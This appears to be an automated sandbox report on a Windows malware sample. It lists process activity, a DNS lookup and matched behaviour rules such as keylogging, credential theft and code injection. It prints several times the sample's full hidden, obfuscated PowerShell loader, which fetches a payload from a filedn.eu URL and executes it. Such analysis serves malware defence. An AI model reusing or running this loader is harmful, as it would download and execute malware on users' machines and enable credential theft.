Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Nov. 27, 2024, 12:32 p.m. | Nov. 27, 2024, 12:34 p.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IZFDLWw" C:\Users\test22\AppData\Local\Temp\Grundtvigsk.cmd
2552-
-
powershell.exe powershell.exe -windowstyle hidden ";$Kridthuset='Mongolioid';;$Milestones225='Hitlerism';;$Tul='ferber';;$Digterkollektivernes='Syndicship';;$Overpsychologized='Rabbinica';;$Goulash=$host.Name;function Spermatozoers($Claustration){If ($Goulash) {$Huserende=4} for ($Diassenes=$Huserende;;$Diassenes+=5){if(!$Claustration[$Diassenes]) { break }$Pseudoprosperous183+=$Claustration[$Diassenes]}$Pseudoprosperous183}function Zantewood15($Sigismond){ .($Sab) ($Sigismond)}$Concentrated62=Spermatozoers 'Plu,n KorESvedt Mes.FlaawStateAnkeBToldCCan lLydli Sekeforfn Ku t';$Cantzari=Spermatozoers ' Ki.M TemoRaa.zShiriterml A tlS,eda S,g/';$Attachtstaskes=Spermatozoers 'TrapTNo elRednsSemi1Un,k2';$kayward='Fysi[UpteNEkspePamatSymp.guaySEndoE IndRCarpVPlaniConvc Po eplagp SubOFi hiFlorNB.rstTevaMMyosATu bnFishAHn.eGOptaEInfurErgo] Bro:Spri:RemisMacreD,piC v lU RomR,rovI Tu.TGal yKondP VrarDr coDamptSe vO BogCSli OV rdL Gui=Res $I dga diat Bl TUna A ocC Reshdel,tWankSRedrTSeclAProtsMarkKunpaeSnoos';$Cantzari+=Spermatozoers 'Posa5 D c. Mid0Ber Fisk( DelW pmaigennnAntid ChioIncuwIn.os Edl ,ysoN Be,TAppr Dema1 Mis0unde. Apr0 Acc;Nonl KompWSacki.rienbaad6Astr4Obs ;Anon ,skbxEr,s6 .ni4disp;apl, AlfrrLorrvAflv:vald1pres3Pugm1a an.Stu 0Ke.e) Shu UdtaGMarkeDelicKrimkStiloBa,i/Disv2Puds0A so1Met 0Char0E di1Genn0Nons1S yk BirFE igiHoverHaule UdrfDiscoUnpexDeni/M no1oppo3 rig1Vvr . Tob0';$Typenavnet=Spermatozoers 'smitUInsesBo ge kabrPerf- ycaam.ntg LiseSkidN,iddt';$Afstbnings=Spermatozoers 'DolihP eptGarat PrepLongsNasi:Gras/Thio/P esfRe miSicilun reLangdSnrkn Stu. 
Live Indu ale/ SpalStea9 Stat ullECutwwIno bAu,u9Ud tsSknd6FredaSenraMe.sR TrawAdve5ForbfVi ryIdenUUntriGlasaPatrCinc 0 ,onlNumbfComp/RestDUskiei lukDobbaFre nDownt Mi eTon rSup iUnwan Sa.gAlleeDisprForbsPens.,ubaaIndvsMossi';$Prims=Spermatozoers 'Undi>';$Sab=Spermatozoers 'IndliGennET.akX';$Telial='Debunkment';$Flyverkommandoerne='\Analyzers.Por';Zantewood15 (Spermatozoers 'Be i$RadiGHilllBortO,okrbHumbAEskal Und: .otsd.gnkHalfdLidee,ervSPseuL ndes ,riE,iniSagroT oll= Ada$HandEFrolnSammV for:StilaLandP Tasp T.aDSkibA oreT ClaA,att+Tetr$IndmfOrduLBansYH,laVBevaE omrFra KCo pO SkaM ulm,acca Fl,nhepaDe otoSurrEUddeRBescNAnape');Zantewood15 (Spermatozoers 'Flag$ FraGUdstL ForoAudiBF mbaepholSreg:MaskDAngeEvarmc Gl,ISygemTradAGaarTHe nEKlas=Defo$ StraTackfOpkoSChi tamphbAnraNSt aI AmpnIberGUne S et.A sts eksPMonalsainIHeliTu,ra(Recr$CardP prerArthI ns mdragS net)');Zantewood15 (Spermatozoers $kayward);$Afstbnings=$Decimate[0];$Trstegnings=(Spermatozoers ' ara$ Na.GSocaL PreoServbGonoApneulProg:PathP disOUnhaL ovYRnkecch.iOSpgen uxidme ke FoaN oveSAl,uAKlidt EttiAutoo.ndiNNone=CoccNNarge inswBald-KamuOWondBCt.nJTrolE Bl cTegntPare PatesEn,my Bu sSterT rubE PucmCono. .rt$FishCIs aoMgl NContCGuilE .ynNeassTSedaR,bsoAWhist RepeI ved ago6Nidg2');Zantewood15 ($Trstegnings);Zantewood15 (Spermatozoers 'Bars$ S ePTilboStaclCog.yS,akc.edfoMicrnHoved SineDralnSkaas NonaMot t AeriBorioForknSom.. 
itHImpreUndfaExtrdCrowePt rrUdsds nuc[,odk$RengTMultyUnsup TekeBrdsn upaVibrvGlannIndteMonot ytm]Ar i=T.ip$ComeCDe aa F rn spotIsm,zV taaSuperW,shi');$Vitriner=Spermatozoers 'Afvn$TranPUvseoprecl lngyAutecPremosnesnGulddOtheealbin tonsLedeaSelvt HouiH,meoRe an Sos.SpriD Molo ,elwStr n frel Mono NonaCla,d,nshFPel iJunilPr oe Gaz(Yakm$ ,asA NonfSubus Pjat cebCh vnEfteiFremnWestg Dipsba f, B,r$KirkGki daFi.ewTi.lbHungy.iga)';$Gawby=$skdeslsest;Zantewood15 (Spermatozoers ' Par$SolsGAgarLB.nnoU.krBSpasa Opbl Bi,:Uforb ouEClerH TraEThorr Sc,SMaskK abuE Sgelsen,SPolyeCrouR est2Komp3land3Whum=Bevi(Sea tS pieSygeSSiphT Sam-PhycpChoraMechTIdeahligg Ubes$JordgSak AGr ewCyklbbn aymalf)');while (!$Beherskelser233) {Zantewood15 (Spermatozoers 'Reci$Typog tyrlForboMor,bFor a nvelPer :MyrmAAleurTocccDeo hScoltD ter M,laS,ryi Re t jeoUnprrTae =Coai$PepoK ilsnTermy Fa,sTrant IntePalst') ;Zantewood15 $Vitriner;Zantewood15 (Spermatozoers 'ZymoSUncaT V na ripRs veT es- Ch S S aL ForeBiseereappLeio Baad4');Zantewood15 (Spermatozoers ' sid$InhugKol LPlanODyveBGulda UnaLext.:terobKonteWi nhOverECo nR VigsEfteK.dfleUkraL AscSAnkyEDesqrAfgu2Nonl3up,p3Li n= Esk( lamTBiffE ImmS iliT Hyp-Cut.PRennaSdekT,ronHP an Era$avi G.lacAHazawFiskBEle,YDeci)') ;Zantewood15 (Spermatozoers 'Modf$ScruGAnbrLUnopO BogB FinABaldLEner:ParasSandhBehoE ,allTonetGro E Vanr B rLSo,mECouns Fo S G,e= C g$utilgAfh LQuesoPercb C paLn,ilBad :GymndMaydI elsNoveS tapI endmTeleI Thel Pe.AS deT areILoveoLeucnSlageDeacnSimu+Lary+ Coa%Tv n$Rigsd maxELayoCCa yiExt,m ForAAreoTU ulERegn. 
EleCAg nOV shUPo.yN DecT') ;$Afstbnings=$Decimate[$Shelterless]}$Bulgari=282946;$Scarab=32008;Zantewood15 (Spermatozoers 'Ko,e$Gy aGFramlmudlOSkakBByggARe kLMill: rifo B.uRLautDPowddG.skEDis LcampiVadenForsGUnquEOmlgrRo,sNYperEUdkm Syl=Unde aagTekre Sket Hal- KekcHermo TilNSe mtY,hweScapn.elhTKab Tea$Bal GSetwaTossWD,mebStrmY');Zantewood15 (Spermatozoers 'M,re$Deglg maal lgeoA thbPrecaPerilReje:.fskBLen iAcricIlankBlo e inkrSaurnGybe Faw=Unde Ea r[O erS utoyhjersTruatUnrieFastm K n. S lC L voDys.n ,orvCurveUralrValltPseu]Hild: Olp:O esF Re,rTecto Fenm HolBAlvoaSlkks FrgeDegr6Sold4UnesS Taut.mburO eriSpernAmbeg Pla(Phyl$abekO R drH pod ob.dIrreeCloslIn,aiDusin EpigInteeUdpar V ln Haaei te)');Zantewood15 (Spermatozoers ' dic$ FerGBikuLCoseO ysiB Prea PoslHenr:Uneve M sn indNSt nuUsu IUnde Sulf=Pakv Opto[E,leS QuiYDignS R nTSupeeRelam Rom..olotSupee pedXSpr.tAars. SpeeTermn VolCBetrOTektd.heeIP,gnnKiosGKupe] nin: G k:EmboaDeg s SydCReg I SoviRese.Ap sg KapePoistCe tsHortTR.itr .nciI tenHamaGDaa (Kaps$ PotbUdspIDu lcPussk luiE krdR .innLeve)');Zantewood15 (Spermatozoers 'Tyr $PlseG ilLI.htoFuldbProvA.adeLBoff:Ulems KerKCompR ,enEGodkOEm,gLAreoi D.eeAgonrChan= .gt$ LinEMonsN acNKnivUSkolI cho.B lesCheluChizb AfrsLokaTBeskrGrusiSmelnSaltgStan(Stra$FredBBiliuHypnl Hy GBi aAEnchR spiSenn,Phr $Beshs recCSlavADe.ir RhoaGrafBEt,n)');Zantewood15 $Skreolier;"
2748
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
filedn.eu | 45.131.244.47 |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell.exe -windowstyle hidden ";$Kridthuset='Mongolioid';;$Milestones225='Hitlerism';;$Tul='ferber';;$Digterkollektivernes='Syndicship';;$Overpsychologized='Rabbinica';;$Goulash=$host.Name;function Spermatozoers($Claustration){If ($Goulash) {$Huserende=4} for ($Diassenes=$Huserende;;$Diassenes+=5){if(!$Claustration[$Diassenes]) { break }$Pseudoprosperous183+=$Claustration[$Diassenes]}$Pseudoprosperous183}function Zantewood15($Sigismond){ .($Sab) ($Sigismond)}$Concentrated62=Spermatozoers 'Plu,n KorESvedt Mes.FlaawStateAnkeBToldCCan lLydli Sekeforfn Ku t';$Cantzari=Spermatozoers ' Ki.M TemoRaa.zShiriterml A tlS,eda S,g/';$Attachtstaskes=Spermatozoers 'TrapTNo elRednsSemi1Un,k2';$kayward='Fysi[UpteNEkspePamatSymp.guaySEndoE IndRCarpVPlaniConvc Po eplagp SubOFi hiFlorNB.rstTevaMMyosATu bnFishAHn.eGOptaEInfurErgo] Bro:Spri:RemisMacreD,piC v lU RomR,rovI Tu.TGal yKondP VrarDr coDamptSe vO BogCSli OV rdL Gui=Res $I dga diat Bl TUna A ocC Reshdel,tWankSRedrTSeclAProtsMarkKunpaeSnoos';$Cantzari+=Spermatozoers 'Posa5 D c. Mid0Ber Fisk( DelW pmaigennnAntid ChioIncuwIn.os Edl ,ysoN Be,TAppr Dema1 Mis0unde. Apr0 Acc;Nonl KompWSacki.rienbaad6Astr4Obs ;Anon ,skbxEr,s6 .ni4disp;apl, AlfrrLorrvAflv:vald1pres3Pugm1a an.Stu 0Ke.e) Shu UdtaGMarkeDelicKrimkStiloBa,i/Disv2Puds0A so1Met 0Char0E di1Genn0Nons1S yk BirFE igiHoverHaule UdrfDiscoUnpexDeni/M no1oppo3 rig1Vvr . Tob0';$Typenavnet=Spermatozoers 'smitUInsesBo ge kabrPerf- ycaam.ntg LiseSkidN,iddt';$Afstbnings=Spermatozoers 'DolihP eptGarat PrepLongsNasi:Gras/Thio/P esfRe miSicilun reLangdSnrkn Stu. 
Live Indu ale/ SpalStea9 Stat ullECutwwIno bAu,u9Ud tsSknd6FredaSenraMe.sR TrawAdve5ForbfVi ryIdenUUntriGlasaPatrCinc 0 ,onlNumbfComp/RestDUskiei lukDobbaFre nDownt Mi eTon rSup iUnwan Sa.gAlleeDisprForbsPens.,ubaaIndvsMossi';$Prims=Spermatozoers 'Undi>';$Sab=Spermatozoers 'IndliGennET.akX';$Telial='Debunkment';$Flyverkommandoerne='\Analyzers.Por';Zantewood15 (Spermatozoers 'Be i$RadiGHilllBortO,okrbHumbAEskal Und: .otsd.gnkHalfdLidee,ervSPseuL ndes ,riE,iniSagroT oll= Ada$HandEFrolnSammV for:StilaLandP Tasp T.aDSkibA oreT ClaA,att+Tetr$IndmfOrduLBansYH,laVBevaE omrFra KCo pO SkaM ulm,acca Fl,nhepaDe otoSurrEUddeRBescNAnape');Zantewood15 (Spermatozoers 'Flag$ FraGUdstL ForoAudiBF mbaepholSreg:MaskDAngeEvarmc Gl,ISygemTradAGaarTHe nEKlas=Defo$ StraTackfOpkoSChi tamphbAnraNSt aI AmpnIberGUne S et.A sts eksPMonalsainIHeliTu,ra(Recr$CardP prerArthI ns mdragS net)');Zantewood15 (Spermatozoers $kayward);$Afstbnings=$Decimate[0];$Trstegnings=(Spermatozoers ' ara$ Na.GSocaL PreoServbGonoApneulProg:PathP disOUnhaL ovYRnkecch.iOSpgen uxidme ke FoaN oveSAl,uAKlidt EttiAutoo.ndiNNone=CoccNNarge inswBald-KamuOWondBCt.nJTrolE Bl cTegntPare PatesEn,my Bu sSterT rubE PucmCono. .rt$FishCIs aoMgl NContCGuilE .ynNeassTSedaR,bsoAWhist RepeI ved ago6Nidg2');Zantewood15 ($Trstegnings);Zantewood15 (Spermatozoers 'Bars$ S ePTilboStaclCog.yS,akc.edfoMicrnHoved SineDralnSkaas NonaMot t AeriBorioForknSom.. 
itHImpreUndfaExtrdCrowePt rrUdsds nuc[,odk$RengTMultyUnsup TekeBrdsn upaVibrvGlannIndteMonot ytm]Ar i=T.ip$ComeCDe aa F rn spotIsm,zV taaSuperW,shi');$Vitriner=Spermatozoers 'Afvn$TranPUvseoprecl lngyAutecPremosnesnGulddOtheealbin tonsLedeaSelvt HouiH,meoRe an Sos.SpriD Molo ,elwStr n frel Mono NonaCla,d,nshFPel iJunilPr oe Gaz(Yakm$ ,asA NonfSubus Pjat cebCh vnEfteiFremnWestg Dipsba f, B,r$KirkGki daFi.ewTi.lbHungy.iga)';$Gawby=$skdeslsest;Zantewood15 (Spermatozoers ' Par$SolsGAgarLB.nnoU.krBSpasa Opbl Bi,:Uforb ouEClerH TraEThorr Sc,SMaskK abuE Sgelsen,SPolyeCrouR est2Komp3land3Whum=Bevi(Sea tS pieSygeSSiphT Sam-PhycpChoraMechTIdeahligg Ubes$JordgSak AGr ewCyklbbn aymalf)');while (!$Beherskelser233) {Zantewood15 (Spermatozoers 'Reci$Typog tyrlForboMor,bFor a nvelPer :MyrmAAleurTocccDeo hScoltD ter M,laS,ryi Re t jeoUnprrTae =Coai$PepoK ilsnTermy Fa,sTrant IntePalst') ;Zantewood15 $Vitriner;Zantewood15 (Spermatozoers 'ZymoSUncaT V na ripRs veT es- Ch S S aL ForeBiseereappLeio Baad4');Zantewood15 (Spermatozoers ' sid$InhugKol LPlanODyveBGulda UnaLext.:terobKonteWi nhOverECo nR VigsEfteK.dfleUkraL AscSAnkyEDesqrAfgu2Nonl3up,p3Li n= Esk( lamTBiffE ImmS iliT Hyp-Cut.PRennaSdekT,ronHP an Era$avi G.lacAHazawFiskBEle,YDeci)') ;Zantewood15 (Spermatozoers 'Modf$ScruGAnbrLUnopO BogB FinABaldLEner:ParasSandhBehoE ,allTonetGro E Vanr B rLSo,mECouns Fo S G,e= C g$utilgAfh LQuesoPercb C paLn,ilBad :GymndMaydI elsNoveS tapI endmTeleI Thel Pe.AS deT areILoveoLeucnSlageDeacnSimu+Lary+ Coa%Tv n$Rigsd maxELayoCCa yiExt,m ForAAreoTU ulERegn. 
EleCAg nOV shUPo.yN DecT') ;$Afstbnings=$Decimate[$Shelterless]}$Bulgari=282946;$Scarab=32008;Zantewood15 (Spermatozoers 'Ko,e$Gy aGFramlmudlOSkakBByggARe kLMill: rifo B.uRLautDPowddG.skEDis LcampiVadenForsGUnquEOmlgrRo,sNYperEUdkm Syl=Unde aagTekre Sket Hal- KekcHermo TilNSe mtY,hweScapn.elhTKab Tea$Bal GSetwaTossWD,mebStrmY');Zantewood15 (Spermatozoers 'M,re$Deglg maal lgeoA thbPrecaPerilReje:.fskBLen iAcricIlankBlo e inkrSaurnGybe Faw=Unde Ea r[O erS utoyhjersTruatUnrieFastm K n. S lC L voDys.n ,orvCurveUralrValltPseu]Hild: Olp:O esF Re,rTecto Fenm HolBAlvoaSlkks FrgeDegr6Sold4UnesS Taut.mburO eriSpernAmbeg Pla(Phyl$abekO R drH pod ob.dIrreeCloslIn,aiDusin EpigInteeUdpar V ln Haaei te)');Zantewood15 (Spermatozoers ' dic$ FerGBikuLCoseO ysiB Prea PoslHenr:Uneve M sn indNSt nuUsu IUnde Sulf=Pakv Opto[E,leS QuiYDignS R nTSupeeRelam Rom..olotSupee pedXSpr.tAars. SpeeTermn VolCBetrOTektd.heeIP,gnnKiosGKupe] nin: G k:EmboaDeg s SydCReg I SoviRese.Ap sg KapePoistCe tsHortTR.itr .nciI tenHamaGDaa (Kaps$ PotbUdspIDu lcPussk luiE krdR .innLeve)');Zantewood15 (Spermatozoers 'Tyr $PlseG ilLI.htoFuldbProvA.adeLBoff:Ulems KerKCompR ,enEGodkOEm,gLAreoi D.eeAgonrChan= .gt$ LinEMonsN acNKnivUSkolI cho.B lesCheluChizb AfrsLokaTBeskrGrusiSmelnSaltgStan(Stra$FredBBiliuHypnl Hy GBi aAEnchR spiSenn,Phr $Beshs recCSlavADe.ir RhoaGrafBEt,n)');Zantewood15 $Skreolier;" |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate privileges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate privileges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
cmdline | powershell.exe -windowstyle hidden ";$Kridthuset='Mongolioid';;$Milestones225='Hitlerism';;$Tul='ferber';;$Digterkollektivernes='Syndicship';;$Overpsychologized='Rabbinica';;$Goulash=$host.Name;function Spermatozoers($Claustration){If ($Goulash) {$Huserende=4} for ($Diassenes=$Huserende;;$Diassenes+=5){if(!$Claustration[$Diassenes]) { break }$Pseudoprosperous183+=$Claustration[$Diassenes]}$Pseudoprosperous183}function Zantewood15($Sigismond){ .($Sab) ($Sigismond)}$Concentrated62=Spermatozoers 'Plu,n KorESvedt Mes.FlaawStateAnkeBToldCCan lLydli Sekeforfn Ku t';$Cantzari=Spermatozoers ' Ki.M TemoRaa.zShiriterml A tlS,eda S,g/';$Attachtstaskes=Spermatozoers 'TrapTNo elRednsSemi1Un,k2';$kayward='Fysi[UpteNEkspePamatSymp.guaySEndoE IndRCarpVPlaniConvc Po eplagp SubOFi hiFlorNB.rstTevaMMyosATu bnFishAHn.eGOptaEInfurErgo] Bro:Spri:RemisMacreD,piC v lU RomR,rovI Tu.TGal yKondP VrarDr coDamptSe vO BogCSli OV rdL Gui=Res $I dga diat Bl TUna A ocC Reshdel,tWankSRedrTSeclAProtsMarkKunpaeSnoos';$Cantzari+=Spermatozoers 'Posa5 D c. Mid0Ber Fisk( DelW pmaigennnAntid ChioIncuwIn.os Edl ,ysoN Be,TAppr Dema1 Mis0unde. Apr0 Acc;Nonl KompWSacki.rienbaad6Astr4Obs ;Anon ,skbxEr,s6 .ni4disp;apl, AlfrrLorrvAflv:vald1pres3Pugm1a an.Stu 0Ke.e) Shu UdtaGMarkeDelicKrimkStiloBa,i/Disv2Puds0A so1Met 0Char0E di1Genn0Nons1S yk BirFE igiHoverHaule UdrfDiscoUnpexDeni/M no1oppo3 rig1Vvr . Tob0';$Typenavnet=Spermatozoers 'smitUInsesBo ge kabrPerf- ycaam.ntg LiseSkidN,iddt';$Afstbnings=Spermatozoers 'DolihP eptGarat PrepLongsNasi:Gras/Thio/P esfRe miSicilun reLangdSnrkn Stu. 
Live Indu ale/ SpalStea9 Stat ullECutwwIno bAu,u9Ud tsSknd6FredaSenraMe.sR TrawAdve5ForbfVi ryIdenUUntriGlasaPatrCinc 0 ,onlNumbfComp/RestDUskiei lukDobbaFre nDownt Mi eTon rSup iUnwan Sa.gAlleeDisprForbsPens.,ubaaIndvsMossi';$Prims=Spermatozoers 'Undi>';$Sab=Spermatozoers 'IndliGennET.akX';$Telial='Debunkment';$Flyverkommandoerne='\Analyzers.Por';Zantewood15 (Spermatozoers 'Be i$RadiGHilllBortO,okrbHumbAEskal Und: .otsd.gnkHalfdLidee,ervSPseuL ndes ,riE,iniSagroT oll= Ada$HandEFrolnSammV for:StilaLandP Tasp T.aDSkibA oreT ClaA,att+Tetr$IndmfOrduLBansYH,laVBevaE omrFra KCo pO SkaM ulm,acca Fl,nhepaDe otoSurrEUddeRBescNAnape');Zantewood15 (Spermatozoers 'Flag$ FraGUdstL ForoAudiBF mbaepholSreg:MaskDAngeEvarmc Gl,ISygemTradAGaarTHe nEKlas=Defo$ StraTackfOpkoSChi tamphbAnraNSt aI AmpnIberGUne S et.A sts eksPMonalsainIHeliTu,ra(Recr$CardP prerArthI ns mdragS net)');Zantewood15 (Spermatozoers $kayward);$Afstbnings=$Decimate[0];$Trstegnings=(Spermatozoers ' ara$ Na.GSocaL PreoServbGonoApneulProg:PathP disOUnhaL ovYRnkecch.iOSpgen uxidme ke FoaN oveSAl,uAKlidt EttiAutoo.ndiNNone=CoccNNarge inswBald-KamuOWondBCt.nJTrolE Bl cTegntPare PatesEn,my Bu sSterT rubE PucmCono. .rt$FishCIs aoMgl NContCGuilE .ynNeassTSedaR,bsoAWhist RepeI ved ago6Nidg2');Zantewood15 ($Trstegnings);Zantewood15 (Spermatozoers 'Bars$ S ePTilboStaclCog.yS,akc.edfoMicrnHoved SineDralnSkaas NonaMot t AeriBorioForknSom.. 
itHImpreUndfaExtrdCrowePt rrUdsds nuc[,odk$RengTMultyUnsup TekeBrdsn upaVibrvGlannIndteMonot ytm]Ar i=T.ip$ComeCDe aa F rn spotIsm,zV taaSuperW,shi');$Vitriner=Spermatozoers 'Afvn$TranPUvseoprecl lngyAutecPremosnesnGulddOtheealbin tonsLedeaSelvt HouiH,meoRe an Sos.SpriD Molo ,elwStr n frel Mono NonaCla,d,nshFPel iJunilPr oe Gaz(Yakm$ ,asA NonfSubus Pjat cebCh vnEfteiFremnWestg Dipsba f, B,r$KirkGki daFi.ewTi.lbHungy.iga)';$Gawby=$skdeslsest;Zantewood15 (Spermatozoers ' Par$SolsGAgarLB.nnoU.krBSpasa Opbl Bi,:Uforb ouEClerH TraEThorr Sc,SMaskK abuE Sgelsen,SPolyeCrouR est2Komp3land3Whum=Bevi(Sea tS pieSygeSSiphT Sam-PhycpChoraMechTIdeahligg Ubes$JordgSak AGr ewCyklbbn aymalf)');while (!$Beherskelser233) {Zantewood15 (Spermatozoers 'Reci$Typog tyrlForboMor,bFor a nvelPer :MyrmAAleurTocccDeo hScoltD ter M,laS,ryi Re t jeoUnprrTae =Coai$PepoK ilsnTermy Fa,sTrant IntePalst') ;Zantewood15 $Vitriner;Zantewood15 (Spermatozoers 'ZymoSUncaT V na ripRs veT es- Ch S S aL ForeBiseereappLeio Baad4');Zantewood15 (Spermatozoers ' sid$InhugKol LPlanODyveBGulda UnaLext.:terobKonteWi nhOverECo nR VigsEfteK.dfleUkraL AscSAnkyEDesqrAfgu2Nonl3up,p3Li n= Esk( lamTBiffE ImmS iliT Hyp-Cut.PRennaSdekT,ronHP an Era$avi G.lacAHazawFiskBEle,YDeci)') ;Zantewood15 (Spermatozoers 'Modf$ScruGAnbrLUnopO BogB FinABaldLEner:ParasSandhBehoE ,allTonetGro E Vanr B rLSo,mECouns Fo S G,e= C g$utilgAfh LQuesoPercb C paLn,ilBad :GymndMaydI elsNoveS tapI endmTeleI Thel Pe.AS deT areILoveoLeucnSlageDeacnSimu+Lary+ Coa%Tv n$Rigsd maxELayoCCa yiExt,m ForAAreoTU ulERegn. 
EleCAg nOV shUPo.yN DecT') ;$Afstbnings=$Decimate[$Shelterless]}$Bulgari=282946;$Scarab=32008;Zantewood15 (Spermatozoers 'Ko,e$Gy aGFramlmudlOSkakBByggARe kLMill: rifo B.uRLautDPowddG.skEDis LcampiVadenForsGUnquEOmlgrRo,sNYperEUdkm Syl=Unde aagTekre Sket Hal- KekcHermo TilNSe mtY,hweScapn.elhTKab Tea$Bal GSetwaTossWD,mebStrmY');Zantewood15 (Spermatozoers 'M,re$Deglg maal lgeoA thbPrecaPerilReje:.fskBLen iAcricIlankBlo e inkrSaurnGybe Faw=Unde Ea r[O erS utoyhjersTruatUnrieFastm K n. S lC L voDys.n ,orvCurveUralrValltPseu]Hild: Olp:O esF Re,rTecto Fenm HolBAlvoaSlkks FrgeDegr6Sold4UnesS Taut.mburO eriSpernAmbeg Pla(Phyl$abekO R drH pod ob.dIrreeCloslIn,aiDusin EpigInteeUdpar V ln Haaei te)');Zantewood15 (Spermatozoers ' dic$ FerGBikuLCoseO ysiB Prea PoslHenr:Uneve M sn indNSt nuUsu IUnde Sulf=Pakv Opto[E,leS QuiYDignS R nTSupeeRelam Rom..olotSupee pedXSpr.tAars. SpeeTermn VolCBetrOTektd.heeIP,gnnKiosGKupe] nin: G k:EmboaDeg s SydCReg I SoviRese.Ap sg KapePoistCe tsHortTR.itr .nciI tenHamaGDaa (Kaps$ PotbUdspIDu lcPussk luiE krdR .innLeve)');Zantewood15 (Spermatozoers 'Tyr $PlseG ilLI.htoFuldbProvA.adeLBoff:Ulems KerKCompR ,enEGodkOEm,gLAreoi D.eeAgonrChan= .gt$ LinEMonsN acNKnivUSkolI cho.B lesCheluChizb AfrsLokaTBeskrGrusiSmelnSaltgStan(Stra$FredBBiliuHypnl Hy GBi aAEnchR spiSenn,Phr $Beshs recCSlavADe.ir RhoaGrafBEt,n)');Zantewood15 $Skreolier;" |
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
cmdline | powershell.exe -windowstyle hidden ";$Kridthuset='Mongolioid';;$Milestones225='Hitlerism';;$Tul='ferber';;$Digterkollektivernes='Syndicship';;$Overpsychologized='Rabbinica';;$Goulash=$host.Name;function Spermatozoers($Claustration){If ($Goulash) {$Huserende=4} for ($Diassenes=$Huserende;;$Diassenes+=5){if(!$Claustration[$Diassenes]) { break }$Pseudoprosperous183+=$Claustration[$Diassenes]}$Pseudoprosperous183}function Zantewood15($Sigismond){ .($Sab) ($Sigismond)}$Concentrated62=Spermatozoers 'Plu,n KorESvedt Mes.FlaawStateAnkeBToldCCan lLydli Sekeforfn Ku t';$Cantzari=Spermatozoers ' Ki.M TemoRaa.zShiriterml A tlS,eda S,g/';$Attachtstaskes=Spermatozoers 'TrapTNo elRednsSemi1Un,k2';$kayward='Fysi[UpteNEkspePamatSymp.guaySEndoE IndRCarpVPlaniConvc Po eplagp SubOFi hiFlorNB.rstTevaMMyosATu bnFishAHn.eGOptaEInfurErgo] Bro:Spri:RemisMacreD,piC v lU RomR,rovI Tu.TGal yKondP VrarDr coDamptSe vO BogCSli OV rdL Gui=Res $I dga diat Bl TUna A ocC 